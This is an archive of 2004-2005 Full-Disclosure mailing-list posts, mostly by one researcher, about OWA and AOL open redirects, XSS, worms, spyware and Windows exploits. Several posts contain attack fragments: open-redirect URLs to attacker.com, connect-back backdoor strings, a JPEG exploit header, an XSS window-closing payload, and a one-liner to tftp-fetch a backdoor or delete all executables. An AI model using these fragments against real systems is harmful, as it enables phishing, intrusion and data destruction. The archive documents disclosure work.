Re: [Full-Disclosure] Multiple vulnerabilities in TrackerCam 5.12
the NDA was with a private vendor what they do with my info is their business On Fri, 2005-02-18 at 14:57, morning_wood wrote: great job... this had been discovered by myself over a year ago, but was only released as a internal to a project i was under an NDA when i discovered it And they did nothing about it for a full year? -- 404 [EMAIL PROTECTED] Textbox Networks ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Multiple vulnerabilities in TrackerCam 5.12
great job... this had been discovered by myself over a year ago, but was only released as a internal to a project i was under an NDA when i discovered it cheers, Donnie ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] google getting attacks; anybody got this? --i got it.
From: Gaurav Kumar [EMAIL PROTECTED] To: full-disclosure@lists.netsys.com Sent: Friday, February 11, 2005 1:50 AM Subject: [Full-Disclosure] google getting attacks;anybody got this? --i got it. google is detecting if search contains inurl:member.php?action=viewpromember= -- myphp forum attack. kiddies are as kiddies do grow up and stop using canned exploits and google searching btw... hope you rot like E2-Labs you backstabbing motherf*uckers cheers, m.w ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] google getting attacks; anybody got this? --igot it.
yes... too bad he cant read... m.w - Original Message - From: Polarizer [EMAIL PROTECTED] To: full-disclosure@lists.netsys.com Sent: Friday, February 11, 2005 3:05 AM Subject: Re: [Full-Disclosure] google getting attacks; anybody got this? --igot it. This is nothing new. Was mentioned here already 06/01/2005. Read on here http://lists.netsys.com/pipermail/full-disclosure/2005-January/030610.html The Polarizer polarizers at its best http://www.codixx.de/polarizer.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] netdde during update
while netdde is not started by default. I did just notice netdde does run during Windows update... this would allow a window of opportunity to exploit the service. a worm using the netdde exploit could take advantage of this before the user fully updates. just noticing, Donnie Werner ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] re: Microsoft Outlook Web Access URL Injection
looks like MS is NOT publicly releasing a fix for this, while they have the means and solution at hand. ( at least under IE ) a kind reader sent this little snippet... ... was able to get Microsoft to provide us with a DLL to drop under IIS 6 to compare URL variable against the Host: header variable and do 302 to web root if they are not similar. This fixed the problem, however, I doubt that Microsoft will make this patch available to the public. what happend to MS commitment to security??? ugg, m.w ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Microsoft Outlook Web Access URL Injection Vulnerability
- EXPL-A-2005-001 exploitlabs.com Advisory 030 - - Microsoft Outlook Web Access - OVERVIEW A vulnerability in Microsoft Outlook Web Access allows malicious attackers to redirect the login to any URL they wish. This allows the attacker to force the user to the site of the attackers choosing enabling the attacker to use social engenering and phishing style of attacks. AFFECTED PRODUCTS = Microsoft Outlook Web Access ( OWA ) Windows 2003 DETAILS === By using specialy crafted URL an attacker can cause the user to redirected to an arbitrary URL to the end user. ATTACK PROFILE == An attacker could gather known user email address for a company that uses OWA. By appending an obfuscated redirected url with a encoded url such as https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://3221234342/ this will take the user to http://example.com when the login box is pressed, and a user is more likely to trust the url. This would be used to send a link to the trusted login. The attacker can then have a page to capture the user / password and redirect back to the original login page or some other form of phishing attack ( or other trusted URL attacks ) SOLUTION Microsoft was contacted on Jan 20, 2005 NO patch has been produced to correct the vulnerability. They have issued the following: on Jan 21, 2005 ( see VENDOR RESPONSE ) This release is dated Jan 25, 2007 PROOF OF CONCEPT 1.https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://[otherhost] 2. https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://[otherhost/file.exe] click login after injection into the form, the source reveals... BODY scroll=AUTO bgColor=#3D5FA3 text=#00 leftMargin=0 topMargin=0 FORM action=/exchweb/bin/auth/owaauth.dll method=POST name=logonForm autocomplete=off INPUT type=hidden name=destination value=http://[otherhost/file.exe]; INPUT type=hidden name=flags value=0 TABLE id=borderTable class=standardTable cellSpacing=0 cellPadding=0 height=100% width=100% bgColor=#3D5FA3 border=0 note: the [otherhost] may easily be obfuscated so as to not alarm the targeted user(s) such as https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://3221234342/ ( http://example.com ) notes: example 1 redirects the user to a url of the attackers choosing. example 2 prompts the user to download an executable or other file. this could be used in conjunction with the aforementioned attack scenario. CREDITS === This vulnerability was discovered and researched by Donnie Werner of exploitlabs.com Donnie Werner [EMAIL PROTECTED] [EMAIL PROTECTED] -- Web: http://exploitlabs.com http://zone-h.org VENDOR RESPONSE === researcher inital: -- Dear Microsoft, The following discusses a potential security vulnerability affecting one of your products. We are bringing it to your attention in order to assist you in investigating it and determining the appropriate actions, and have provided preliminary information about the potential vulnerability below. Please read our disclosure policy, available at http://www.exploitlabs.com/disclosure-policy.html if you have any questions. Please confirm using the contact information I have provided below that you have received this note. We look forward to working with you, Exploitlabs Research Team Donnie Werner [EMAIL PROTECTED] vendor response 1 - Hello Donnie, Thanks very much for contacting us. We have investigated reports of this behavior in the past and plan to fix it in the next major release of Exchange. Please let me know if you have further questions. Thanks, Christopher, CISSP researcher initial 2 Christopher, when is the next major release of Exchange due? I think it may be in the interest of admins to know this flaw exists, and to possibly alert thier users of potential phishing attacks and to help secure their systems. Exchange 2003 OWA is used extensivly in corporate environments, where this flaw will have the most impact being this is a moderate remote threat, this researcher feels that PUBLIC FULL DISCLOSURE is needed. possibly MS would be willing to issue a statement to the public regarding this issue at this time. regards, Donnie Werner ( no fancy letters ) vendor response 2 - (none) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Is there a 0day vuln in this phisher's site?
if you mean http://www.exploitlabs.com/urlbar.html ... then I sent MS an advisory of this... they are working on a patch. funny... i just noticed my first PoC of this is dated 08/27/04 ( http://www.kb.cert.org/vuls/id/490708 ) is dated 2001 !!! MS response #1 Thank you for sending this report. We're currently investigating this issue, however it looks to be a duplicate of other UI spoofing issues that have been posted. For reference please see the below: http://freehost07.websamba.com/greyhats/dlwinspoof-menu.htm We've worked to address this update in XPSP2 by default in the Internet Zone, and the option exists to enable this mitigation for other zones via the registry or group policy. Please let me know if you issue is a separate vulnerability from the one listed above. MS response #2 Donnie, Thank you for the explanation. I've been doing more research, and it seems that while the proof-of-concept you've provided is different than the one from Greyhats I sent earlier, it still seems that this is a known issue originally discovered by Georgi Guninski and Andrew Clover. I've found a US-CERT Alert on the malicious use of chromeless windows to spoof UI linked below and a CVE entry. I think this is the same issue, if its not please let me know the difference and I apologize for the confusion. We are tracking this issue and working to resolve it. So far the first public fix for this is in XPSP2. You may also look at the Windows Server 2003 SP1 Release Candidate as that should include the mitigations for this issue as well. http://www.kb.cert.org/vuls/id/490708 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1410 soo... So have I. Not to diminish the importance of the attack, but this assumes the default placement of Address Bar if I'm not mistaken, so if the user changes their toolbar layout the popup will give itself away, correct? possibly yes... tested 1. win2k ie6 default bar position - YES 2. winXPsp1 ie6 non default bar position - locked - YES 3. winXPsp2 ie6 default bar position - NO my example provided is different in effect than the MS provided PoC link, but they use the same type of coding cheers, Donnie Werner ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] NAT router inbound network traffic subversion
scenario... NAT client browses web... NAT client initates a HTTP request to do this... ROUTER returns the request to NAT client... ( normal activity ) attacker website exploits client browser... exploit drops and executes badfile.exe badfile.exe hooks iexplore.exe... badfile.exe is 'reverse connecting trojan'... badfile.exe initiates a HTTP request to do this... attacker's badfile.exe' 'client' is waiting with a HTTP server... the new hooked browser initiates a HTTP request to the attacker. NAT client is now connected to the attacker through the ROUTER ( kinda like browsing the web huh? ) attacker now has unrestricted packet via the NAT client, that is where ??? BEHIND YOUR ROUTER atacker now can do a he wishes to the rest of your network ( GAME OVER ) Cheers, m.w ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: [ GLSA 200501-36 ] AWStats: Remote codeexecution
I don't have the time to investigate the cgi and dc binaries. The cgi at least tries to daemonize and opens a TCP listening socket. They also try to replace the index page on the vulnerable site. cgi 1495 1495 0 /dev/tty 149E 149E 0 socket 14AA 14AA 0 listen 14C0 14C0 0 PsychoPhobia Backdoor is starting... 254E 254E 0 init.c dc 09C0 09C0 0 Welcome to Data Cha0s Connect Back Shell 09E9 09E9 0 No More Damn Issue Commands 0A20 0A20 0 Data Cha0s Connect Back Backdoor 0A42 0A42 0 /bin/sh 0A4D 0A4D 0 XTERM=xterm 0A59 0A59 0 HISTFILE= 0A63 0A63 0 SAVEHIST= 0A6D 0A6D 0 Usage: %s [Host] port 0A86 0A86 0 [*] Dumping Arguments 0A9C 0A9C 0 [*] Resolving Host Name 0AB4 0AB4 0 [*] Connecting... 0AC6 0AC6 0 [*] Spawning Shell 0AD9 0AD9 0 [*] Detached 4321 4321 0 dc-connectback.c cheers, m.w ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] New Santy-Worm attacks *all* PHP-skripts
The relevant code:
-
$procura = 'inurl:*.php?*=' . $numr;
for($n=0;$n900;$n += 10){
$sock = IO::Socket::INET-new(PeerAddr = www.google.com.br, PeerPort =
80, Proto = tcp) or next;
print $sock GET /search?q=$procurastart=$n HTTP/1.0\n\n;
nothing new here...
unless... we try the L337 G00GLE HAX0R S34RCH STR!NGZ
http://www.google.com/search?q=inurl:*.php%3F*%3Dhl=enlr=newwindow=1start=90sa=N
BUT !!! LIES !!! LIES I SAY
GOOGLE IS TELLING ME I AM INFECTED ( lmfao )
--- / SNIP /--
and it appears that your computer or network has been infected
---/ SNIP /--
WRONG ANSWER WRONG EXPLAINATION WRONG JUST WRONG
We're sorry...
.. but we can't process your request right now. A computer virus or spyware
application is sending us automated requests, and it appears that your
computer or network has been infected.
We'll restore your access as quickly as possible, so try again soon. In the
meantime, you might want to run a virus checker or spyware remover to make
sure that your computer is free of viruses and other spurious software.
We apologize for the inconvenience, and hope we'll see you again on Google.
bleh, now i need to find a new best friend... GOOGLE LIED :(
m.w
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Windows (XP SP2) Remote code executionwithparameters
hhctrl.ocx is not installed by default in all SP1s but is on all SP2. Therefore when the exploit page tries to create the object he cannot find it so it tries to install it. On SP2 it exists by default therefore created silently. i replied to this because of this statement by the O.P.. Any system running any Microsoft Windows XP edition with Internet Explorer 6 or higher, even with SP2 applied. this suggests that all XP are affected by default, including sp2. cheers, m.w p.s. I have noticed that the final pre-release of SP2 is much better ( in my experience ) performance and security wise. ( and it retains raw sockets ). In SP2rc2, IE6 popup blocker stopped the PoC at default settings. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] AOL website redirection scripts allow for abuse
i think there is many like this http://g.msn.com/0AD00014/?http://google.com http://g.msn.com/0AD00014/?http://example.com etc etc etc your examples actually use an on-site URL redir and i recall some from yahoo as well used extensivly for spam im quite sure they ( AOL ) knows about this , and is a purpose built feature. my 2 bits, m.w - Original Message - From: Michel Blomgren [EMAIL PROTECTED] To: bugtraq@securityfocus.com; full-disclosure@lists.netsys.com Sent: Sunday, December 26, 2004 9:43 AM Subject: [Full-Disclosure] AOL website redirection scripts allow for abuse tigerteam.se security advisory - TSEAD-200412-1 www.tigerteam.se Advisory: Hole in AOL's redirection scripts allow for abuse. Date: Sat Dec 18 02:29:52 EST 2004 Application: AOL's redir, redir.adp, clickThruRedirect.adp, and frame.adp scripts. Vulnerability: Lack of input filtering allows for redirection abuse. Reference: TSEAD-200412-1 Author: Xavier de Leon [EMAIL PROTECTED] SYNOPSIS http://www.corp.aol.com/whoweare/mission.shtml VULNERABILITY The scripts in question allow input from external resources without validation or filtering of any sort. Thus allowing spammers, phishers, and other potential attackers a greater deceptive advantage. On another note, it is widely known that AOL utilizes a rating system (throttling) on Instant Messages and e-mails based on content; specifically spam. However, with the domain prefix aol.com|.* in the mix, rating doesn't seem to be quite effective. And that enables spammers and phishers access to spread their content around while bypassing certain throttling rates. COMMENT In an environment where AOL users are being phished constantly via Instant Messenger or e-mail, people are being outwitted into giving up sensitive credentials by clicking on arbitrary links. This is where the stated vulnerabily steps in. Although the redirection attacker host can be seen from the url itself, it can be easily hex'd. Example: http://dynamic.aol.com/cgi/redir?http://%77%77%77%2e%74%69%67%65%72%74%65%61%6d%2e%73%65 (redirects to www.tigerteam.se) [ or http://dynamic.aol.com/cgi/redir?http://tigerteam.se ] From the example above, one must note that the http://; protocol text must be included or else the script redirects to ./ (in this case being /cgi/) Once redirected, the attacker host will be seen on the address bar. DISCOVERY Xavier de Leon [EMAIL PROTECTED] While looking randomly through the AOL pages, I spotted a call to the 'redir' script. I entered a bogus url and it redirected without any error messages whatsoever. I searched several search engines (google/vivisimo/yahoo) for pages within AOL which made calls to scripts with 'edir' in their name, and ran into the clickThruRedirect.adp and redir.adp scripts. It turns out they both had the same problem. Upon such results, I began furthur research into the situation. EXPLOITATION http://dynamic.aol.com/cgi/redir?http://www.attacker.com http://aolsvc.aol.com/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com http://content.alerts.aol.com/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com http://www.aol.com/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com http://sinbad.aol.fr/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com http://www.shopping.aol.fr/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com http://ht-brands.aol.com/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com http://aolreseau.aol.fr/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com http://phileas.aol.fr/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com http://publish.groups.aol.com/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com http://shop.aol.com/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com http://www.aolatschool.com/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com http://webcenter.shop.aol.com/ams/clickThruRedirect.adp?0,0,http://www.attacker.com http://findajob.aol.com/ams/clickThruRedirect.adp?0,0x0,http://attacker.com http://expressions.aol.com/redir.adp?_dci_url=http://www.attacker.com http://www.aol.ca/ams/clickThruRedirect.adp?0,0x0,http://attacker.com http://entertainment.channels.aol.ca/redir.adp?_dci_url=http://www.attacker.com http://redirect.aol.ca/cgi/redir-complex?sid=0url=http://www.attacker.com http://news.channels.aol.ca/redir.adp?_dci_url=http://www.attacker.com http://travel.channels.aol.ca/redir.adp?_dci_url=http://www.attacker.com http://www.defidumarche.aol.ca/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com http://shop.aolcanada.aol.ca/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com http://finance.channels.aol.ca/redir.adp?_dci_url=http://www.attacker.com http://women.channels.aol.ca/redir.adp?_dci_url=http://www.attacker.com
Re: [Full-Disclosure] IE sp2 and Mozilla Firefox DoS.
even Microsoft publishes PoC for browser DoS ( multi platform too )
see:
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dninstj/html/privacyforbrowserusers.asp
-- / snip / --
var big_string = double me up!;
while (true)
{
big_string = big_string + big_string; // 20 iterations equals all your
memory...
}
- / snip /
kinda funny... unpatched too!
cheers,
m.w
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Cross-Site Scripting - an industry-wide problem
quite commom, funny because xss can be used in PHISHING attacks. instead of alert blah try some html redirects to a hosted site with a fake login spoofing the original content ( a login page ) and capture username/password then pass them to the real login page. or better yet... xss dos attacks, like. [script] alert(oh no) ;window.close() [/script] but i guess xss is just kiddi play... or is it? m.w Cross-Site Scripting - an industry-wide problem === In early december i started a series of tests to find Cross-Site Scripting (XSS) vulnerabilities. It quickly turned out that the majority of all major websites suffer some kind of XSS. This is a disclosure of 175 vulnerabilities at once. Enjoy the ride... Test scenario = A site was considered affected if it is possible to inject a javascript into the output page by making a browser GET or POST request to the webserver. As a proof-of-concept the script alert(document.cookie) got used. All tests were made on a fully patched WinXP SP2 machine and Internet Explorer 6. Most of the proof-of-concept links in this report will not work using another browser, mainly because in many cases i used javascript in styles which isn't supported by browsers like Firefox and because Firefox automaticly applies character encoding to a URL. I was just too lazy to test each issue cross-browser, so this doesn't mean automaticly that Internet Explorer is more vulnerable to XSS. Impact == In many cases XSS is reduced to the attack of stealing session cookies, but XSS can be used to do a lot more things. Using DOM manipulation you can change the target of a login form or fake one, change download links or simply insert your own content into a website. As part of mass-mailings this can be used for login data phishing, spreading of malware or distribution of false news that seem to come from a trustworthy source (which is an intresting option for daytraders on penny stocks for example). Don't forget that the injected script is running in the security context of the affected site. If you know who you are attacking and that the victim has the affected site in a special trusted zone it can be possible to execute not safe for scripting ActiveX controls - giving you more or less total control. In intranets and for extranet web applications this is a not so uncommon configuration. For sure XSS is nothing compared to a remote buffer overflow. But only because this worst case scenario is happening quite often these days, it does not mean XSS is not a security issue. XSS flaws are easy to find and spammers are always searching for new stuff. Finally for some sites on the list dedicated to security a XSS flaw is just an embarrassing thing ;) Affected sites == This list is reduced to the second-level domain for readability and posting size. This isn't always fair since sometimes a sub-domain is indepentend from the SLD. Please download the complete list of proof-of-concept links from http://www.mikx.de/xss.php. All webmasters were informed by an email and/or their website feedback forms during december, to give them a fair chance to react. Some of them replied really quick and patched the issue in a few hours, others (sadly a lot) never replied. If you are responsible for one of the affected sites and you have not been informed or are not able to reproduce the issue, please don't hesitate to contact me. The sites in the tests were picked at random from international and german major websites and/or sites related to security/computers. I just tested what came to my head - so there is no hidden message: about.com, activestate.com, adobe.com, altavista.com, amazon.com, amd.com, annoyances.org, aol.com, apache.org, apple.com , archive.org, arcor.de, ask.com, ati.com, bahn.de, bitdefender.de, blizzard.com, blogdex.net, blogger.com, bloogz.com, ca.com, ccc.de, cdu.de, chip.de, ciao.de, cert.org, chillingeffects.org, cnn.com, comdirect.de, consors.de, csialliance.org, csu.de, dell.com, daypop.com, divx.com, dooyoo.de, doubleclick.com, download.com, easycredit.de, ebay.com, etrade.com, evite.com, excite.com, fedex.com, fimatex.de, flexwiki.com, fool.com, free-av.de, freshmeat.net, fsf.org, fujitsu.com, gamestar.de, gm.com, gmx.net, gnu.org, go.com, golem.de, google.com, groupee.com, gruene-partei.de, guenstiger.de, heise.de, hosting.com, hp.com, ibm.com, icq.com, idealo.de, imagemagick.org, infineon.com, informationsecurityireland.com, infospace.com, intel.com, itaa.org, izb.de, jamba.de , juno.com, kde.org, kelkoo.de, kerio.com, liberale.de, linspire.com, looksmart.com, lufthansa.com, lycos.com, macromedia.com, mandrakesoft.com, mayflower.de, mcafee.com, meetup.com, messagelabs.com, metacrawler.com, metadot.com, microsoft.com, mlb.com, mnogosearch.org, modblog.com, modssl.org, mozilla.org, mozillazine.org, msdn.com, msn.com, msnbc.com, nasa.gov,
Re: [Full-Disclosure] Re: Possible apache2/php 4.3.9 worm
Below are some examples of what an actual Santy search request would look like: http://www.google.com/search?num=100hl=enlr=as_qdr=allq=allinurl%3A+%22viewtopic.php%22+%22topic%3D27516%22btnG=Search http://www.google.com/search?num=100hl=enlr=as_qdr=allq=allinurl%3A+%22viewtopic.php%22+%22t%3D2580%22btnG=Search http://www.google.com/search?num=100hl=enlr=as_qdr=allq=allinurl%3A+%22viewtopic.php%22+%22p%3D6653%22btnG=Search If Google were to block this particular pattern of search request it would stop the spread of the worm for now. looks like they did... / snip / Google Error We're sorry... .. but we can't process your request right now. A computer virus or spyware application is sending us automated requests, and it appears that your computer or network has been infected. We'll restore your access as quickly as possible, so try again soon. In the meantime, you might want to run a virus checker or spyware remover to make sure that your computer is free of viruses and other spurious software. We apologize for the inconvenience, and hope we'll see you again on Google. / snip / -- cheers, m.w ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] This sums up Yahoo!s security policy to a -T-
If their refusal to release that mail even after their customer is dead is an indication as to their privacy practices, three cheers for Yahoo. Don't you get the whole slippery slope thing? If it's ok when you're dead (which it's not, my stuff is my stuff...destroy it when you're sure I've really shuffled off elsewhere, unless I gave you very specific instructions otherwise) then maybe it's ok if you are in a coma...then maybe it's ok if you are really sick and someone else is your legal guardian becaue you've been declared non-compos mentis...then maybe it's ok if it's your parents...or your wife...or a concerned neighbor... What's in that mailbox is/was mine, none of your business unless I chose to share it. i couldnt agree more... another case of lame, illogical media bullshit BRAVO YAHOO happy hollidays, m.w ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Official IFRAME patch - make sure it installs correctly
I can confirm on WinXP SP1 ( download the [patch].exe run and reboot) Mr Wever's exploit PoC did not run ( no shell, dialog warning ) cheers, m.w The IFRAME vulnerability has been patched, see http://www.microsoft.com/technet/security/bulletin/ms04-040.mspx The wording in ms04-040 is so vague, I am not entirely sure that this patch is a fix for the IFRAME bug(s)? *** Make sure you are patched after installing *** I installed it using Automatic Updates (on Win2ksp4), rebooted and loaded my InternetExploiter.html: IT STILL WORKED!! Even though both Automatic Updates and http://windowsupdate.microsoft.com; reported that I was patched!?! I manually downloaded the exe and ran it, rebooted and now I'm finally truely patched. Just so I am clear, after automatic updates applied the critical patch on W2KSP4 and rebooted, the IFRAME exploit still worked, but manually downloading the executable given in the Microsoft alert and running it results in a system on which the IFRAME exploit no longer works? This would be confirmation that ms04-040 actually does address the IFRAME exploit. Kevin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Network Sniffing
http://sourceforge.net/projects/showtraf showtraf. i use this everyday, its free, easy, simple, and small ( 1 file ). ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] overburning edit of molded cdroms feasible?
.. molded cdroms.. ( i assume you mean pressed cdroms like MsWindows or Doom3 that you buy) do you even know how they are made?!? .. you cant burn more data on a molded cdrom, as the reflective layer is not only not burnable, but never was burnt to begin with. but thanks for playing!!! mabey a better idea is hard drives and usb thumbdrives, how about some floppys!!! or mabey cover the anti-record tabs on some audio cassettes, record over some Britney with some Megadeath or.. nevermind. *sigh* m.w p.s. next time please do some research... http://www.google.com/search?hl=enq=how+pressed+cdroms+are+made http://www.burnworld.com/cdr/primer/ - Original Message - From: Saber Taylor [EMAIL PROTECTED] Subject: [Full-Disclosure] overburning edit of molded cdroms feasible? Scenario: chinese agent buys molded cdroms from stores in Washington D.C. and overburns new data along the same spiral with a specialized cdrom drive. Returns the cdroms to the story which then re-shrinkwraps and puts back on the shelf. 1.) Is this possible? 2.) Could firmware automatically do a quick check for this? Thanks. [EMAIL PROTECTED] __ Do you Yahoo!? ^^ no, and stop asking me ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Network Security in India
then there was this little diddy... HYDERABAD: The hacker is on the prowl and the government can do little to stop him in his tracks. At least, that's what the IT department - custodian of the government web sites and servers ... http://timesofindia.indiatimes.com/articleshow/320561.cms cheers, D.W ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] For your pleasure
oh? - 08/23/2001 05:00 AM 354,468 wmpaud1.wav ( bintext output ) 00056862 00056862 0 INFOICRD 0005686E 0005686E 0 2000-04-06 00056882 00056882 0 Deepz0ne 00056894 00056894 0 Sound Forge 4.5 - ..heh Guys, For your pleasure: http://www.materiel.be/n/7685/Des-fichiers-pirates-dans-XP.php I know, it is in French, but here is my translation, it deserves to be known. Digging into Windows XP Operating Systems, the journalists of PC Welt discovered the following text at the end of the files presents into the C:/Windows/Help/Tours/WindowsMediaPlayer/Audio/Wav directory: [see the picture at the link] You have to know that DeepzOne is the nickname of a founding member of the Radium cracking group created in 1997 and especialized into the craking of sound oriented software. To say it another way, the Microsoft guy who created these files used a cracked version of the SoundForce program. Even if it is probable the Redmond giant has a license of this program (400$), it looks bad to see this when we are hearing everywhere about the Microsoft anti-piracy policy... Laurent LEVIER Systems Networks Security Expert, CISSP CISM ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] media-motor.net
file is a MSVB exe, here are some fun strings from the binary... ( spyware, but not a trojan ) http://www.maxmind.com:8010/a?l=PeAyF1sgrZYwi=\tempf.txt \usta32.ini http://mmm.media-motor.net/bundle.php?aff=\affbun.txt phases sewers outers c:\asdf.txt randomdll mydll randomocx \regsvr32 /s randomexe myexe SOFTWARE\Microsoft\Windows\CurrentVersion\Run uinstaller unstall.exe SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\media-motor DisplayName Media-motor \unstall.exe http://logs.media-motor.net/log3.php?c=what=newinstallaff=country= \tempf2.txt what=dupinstallaff= anyone familiar with this group (media-motor.net/Roings.com) ? they seem to be sending downloader.trojan files to unsuspecting people using everyone.net webmail accounts. http://mmm.media-motor.net/soft/default.exe the webmail i discovered it on was from sunguru.com tries to download that file everytime i log in or log out.? proally using IE huh? fun stuff, m.w ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MSIE IFRAME and FRAME tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!))
bindshell success ( html run from local ) connect from remote success... this is NASTY if shellcode modified this will do reverse or exe drop i assume good work, Donnie Werner ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Slightly off-topic: www.georgewbush.com
Obviously not many of you Americans ( which I am ) travel to Europe much do you. You fail to see, and therefore cannot comprehend the attitude of many Europeans about the attitudes of the American government ( f*cking with other parts of the world ) for peace and freedom when it is about OIL. I am not anti American... meerly observant. can we kill this topic now? ( its rather pointless ) m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Slashdot: Gmail Accounts Vulnerable to XSS Exploit
there is a [x] box.. Don't ask for my password for 2 weeks. this sets the users cookie. Gmail uses the cookie for authentication. XSS holes are not (as we all know) an immediate bypass for any authentication. right It can be used, with a bit of work, to steal cookies/authentication data from unexpecting users, NOT as an immediate break-into-accounts kiddie tool. right However, the interesting thing I found about this article was this line: regardless of whether or not the password is subsequently changed Does Gmail use some sort of static security key? Does anyone have any further details on the security implemented by Google in their new service? see above. m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Hacking into private files, my credit card purchases, personal correspondence or anything that is mine is trespassing and criminal.
phood 4 th0ugh7, last i heard being on the internet was voluntary... ( whether you are a person or business enity and many successfull business have no internet presence ) if i am correct... being on the the internet is not manditory to conduct life sustaining activities... ( eat, shit, sleep [ pay bills to sustain the aforementioned activities ] ) and, correct me if i am wrong... i cannot harm you via the internet hint: get off the internet and stop bitching ( and no, you cannot sue and litigate ) my 2 bits, m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] XP Remote Desktop Remote Activation
a malicious user who has already gained a command shell to activate umm... you already own the box. try... tftp -i yourhost get evilbackdoor.exe ( vnc mabey ) or c:\del *.exe /s c:\shutdown -r I realy do not see the SECURITY ISSUE here. cheers, m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ...
umm, no all this has thats different is correct headers for bind or remote shell option. and ability to set ports and return ip in the code, instead of needing to use your own shellcode ( or metasploits ) note: there is no new exploit code or vector --- / snip /- new. char header1[] = \xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64 \x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00 \x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65 \x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19 \x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26 \x2E\x3E\x35\x35\x35\x35\x35\x3E; --- / snip /- old. --- / snip /- char header1[]= \xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64 \x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00 \x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65 \x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19 \x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26 \x2E\x3E\x35\x35\x35\x35\x35\x3E; --- / snip /- take your media hype and die kthnx, m.wood the last step before the worm http://www.k-otik.com/exploits/09252004.JpegOfDeath.c.php ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Scandal: IT Security firm hires the author of Sasser worm
